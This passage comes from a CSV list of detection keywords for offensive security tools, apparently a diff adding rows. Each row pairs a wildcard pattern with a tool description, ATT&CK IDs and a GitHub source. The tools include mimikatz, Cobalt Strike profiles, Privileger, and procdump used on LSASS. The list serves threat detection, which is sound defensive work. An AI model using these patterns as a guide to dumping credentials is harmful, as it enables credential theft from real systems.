- T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ProcessInjection_Getsystem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Privileger.cpp*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privileger.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" 
+"*Privileger-main.*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privilegerx64.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privilegerx86.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*PrivKit32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*PrivKit-main*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","real 
password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*procdump* lsass.exe *.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*procdump*lsass*","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","N/A","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*procdump.exe*lsass*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*procdump/dump_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*procdump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*procdump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*procdump_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*process::exports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::imports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::runp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process_herpaderping*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*process_imports.cna*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*process_imports.x64*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*process_imports_api *.exe*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_min_alloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_startrwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Process_Inject_Struct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*process_inject_transform_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 
